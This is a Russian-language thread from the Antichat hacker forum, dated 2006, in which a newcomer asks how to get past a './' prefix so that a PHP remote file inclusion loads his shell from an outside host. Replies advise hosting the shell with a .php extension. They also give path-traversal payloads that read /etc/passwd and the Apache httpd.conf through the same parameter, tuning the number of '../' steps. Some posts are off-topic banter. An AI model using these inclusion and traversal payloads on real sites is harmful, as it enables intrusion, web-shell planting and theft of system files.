Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
13.03.2006, 06:36
|
|
Новичок
Регистрация: 07.03.2006
Сообщений: 22
Провел на форуме:
94252
Репутация:
-3
|
|
инклуд
вот чтоу меня получилось:
запрос допустим такой- http://www.target.com/index1.php?pag....com/shell.txt
в браузере вижу - Warning: Failed opening ' ./http://mypage.org/shell.txt' for inclusion (include_path='.:/usr/share/pear:/home/httpd/phplib') in /home/target/public_html/index1.php on line 63
./ - возможно ли как-то обойти, чтобы заинклудить файл/скрипт/что_нибудь_ещё?
Не гнобите сильно, если это проскакивает тут в стотысячный раз ) |
|
|
13.03.2006, 18:08
|
|
Участник форума
Регистрация: 16.07.2004
Сообщений: 196
Провел на форуме:
2509801
Репутация:
211
|
|
шелл нужно заливать на сайт с расширением php (!) А не с тхт - он выполнятся должен, а серевер на котором возможно есть инклуд, воспринимает его как обычный текстовик.
И еще на конце не нужно писать расширение пхп - http://mypage.com/shell если не катит то можно попробыва добавить его - в разных системах по разному  |
|
|
|
14.03.2006, 18:25
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818
Репутация:
569
|
|
Нет, ./ не обойти. В твоем случае можно выполнять лишь локальный инклуд
|
|
|
|
14.03.2006, 18:38
|
|
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553
Репутация:
1329
|
|
попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd
Если пройдёт то
__http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf
|
|
|
|
14.03.2006, 19:21
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818
Репутация:
569
|
|
Сообщение от limpompo
попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd
Если пройдёт то
__http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf
опять же непонятно число уровней до корневой директории с корня веб-сервака. т.е. количество "../" менять постепенно вверх.
[offtop]
ну почему у меня ник темно-зеленый, а у лимпопо - светло-зеленый?
[/offtop]
|
|
|
|
14.03.2006, 19:23
|
|
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
Провел на форуме:
9751364
Репутация:
1847
|
|
[offtop]
ну почему у меня ник темно-зеленый, а у лимпопо - светло-зеленый?
[/offtop]
Ночной дозор. Всем выйти из сумрака! 
|
|
|
|
14.03.2006, 19:23
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd
никогда не понимал смысл вот этого
наверное статьи аля 80х, где цель всегда passwd, оставили свой след...
|
|
|
|
14.03.2006, 23:52
|
|
Новичок
Регистрация: 07.03.2006
Сообщений: 22
Провел на форуме:
94252
Репутация:
-3
|
|
Сообщение от limpompo
попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd
Если пройдёт то
__http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf
Пробовал впервую очередь, всё равно добавляет это злобное ./ (
|
|
|
|
14.03.2006, 23:56
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
[offtop]
Trinux он же и в МОА ив АМА
[/offtop]
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Php- инклуд.
|
•••™NO FEAR™••• |
Уязвимости |
6 |
27.01.2006 08:58 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
